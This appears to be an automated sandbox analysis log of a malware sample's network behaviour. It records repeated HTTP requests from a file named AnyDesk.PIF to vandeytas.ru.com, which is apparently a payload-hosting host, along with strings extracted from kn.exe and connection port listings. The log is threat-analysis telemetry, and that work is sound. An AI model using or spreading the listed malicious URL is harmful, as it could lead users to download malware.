      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficDNS traffic detected: DNS query: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:38:48 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:38:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:38:53 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:38:55 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:38:57 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:15 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:19 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:22 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:24 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:28 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:30 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:37 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:41 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:43 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:46 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:48 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:54 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:56 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:39:58 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:14 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:16 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:20 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:22 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:25 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:27 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:31 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:37 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:40:46 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
      Source: AnyDesk.PIF, AnyDesk.PIF, 00000009.00000002.2941867830.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720468167.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2957250885.000000007F9FF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2942456888.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
      Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
      Source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
      Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
      Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
      Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
      Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
      Source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
      Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
      Source: AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/
      Source: AnyDesk.PIF, 00000009.00000003.2026067126.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2048349573.0000000000911000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/-
      Source: AnyDesk.PIF, 00000009.00000002.2956191980.000000002094D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlv
      Source: AnyDesk.PIF, 00000009.00000002.2956191980.000000002091E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2354387925.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2504432392.000000000091F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000920000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2354387925.0000000000920000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2940156410.0000000000901000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2940156410.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2025906344.0000000000920000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2048222769.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1983917609.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2048349573.0000000000901000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2308408762.000000000091F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2308408762.0000000000901000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2916840538.000000000091C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000901000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2048222769.000000000092C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2504432392.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2308408762.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinff
      Source: AnyDesk.PIF, 00000009.00000003.2354387925.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinff/
      Source: AnyDesk.PIF, 00000009.00000003.2354387925.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinff1
      Source: AnyDesk.PIF, 00000009.00000002.2940156410.000000000091E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2916840538.000000000091C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinff;
      Source: AnyDesk.PIF, 00000009.00000003.1919870551.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffL
      Source: AnyDesk.PIF, 00000009.00000003.2308408762.000000000092C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2354387925.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffLL
      Source: AnyDesk.PIF, 00000009.00000003.1919870551.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffLLI
      Source: AnyDesk.PIF, 00000009.00000002.2940156410.000000000091E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffLLg
      Source: AnyDesk.PIF, 00000009.00000003.2460677716.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2916840538.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffM
      Source: AnyDesk.PIF, 00000009.00000002.2940156410.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2916840538.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffT
      Source: AnyDesk.PIF, 00000009.00000003.1919870551.000000000092C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1983981138.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffY
      Source: AnyDesk.PIF, 00000009.00000003.2460677716.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2940156410.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2048222769.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2504432392.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2308408762.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinffc
      Source: AnyDesk.PIF, 00000009.00000002.2940156410.000000000091E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2916840538.000000000091C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinffg
      Source: AnyDesk.PIF, 00000009.00000003.2460677716.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinffj
      Source: AnyDesk.PIF, 00000009.00000003.2765080066.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinffq
      Source: AnyDesk.PIF, 00000009.00000003.2916840538.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2765080066.00000000008E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinffv4
      Source: AnyDesk.PIF, 00000009.00000003.2354511256.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/5
      Source: AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/7000
      Source: AnyDesk.PIF, 00000009.00000003.2048349573.0000000000911000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/8g
      Source: AnyDesk.PIF, 00000009.00000003.2916840538.0000000000912000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/=
      Source: AnyDesk.PIF, 00000009.00000003.2612107894.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/E
      Source: AnyDesk.PIF, 00000009.00000003.2354511256.0000000000911000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1782604010.00000000008F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/M
      Source: AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/Qu
      Source: AnyDesk.PIF, 00000009.00000003.2026067126.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2048349573.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/U
      Source: AnyDesk.PIF, 00000009.00000003.2048349573.0000000000911000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/m
      Source: AnyDesk.PIF, 00000009.00000003.2026067126.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1782604010.00000000008F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/u
      Source: AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/ww.vU
      Source: AnyDesk.PIF, 00000009.00000003.2026067126.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com:443/233_Hlvzmhuinff
      Source: AnyDesk.PIF, 00000009.00000003.2916840538.0000000000906000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2612107894.0000000000906000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2765080066.0000000000906000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2940156410.0000000000906000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2460677716.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com:443/233_Hlvzmhuinffvandeytas.ru.comvandeytasr
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
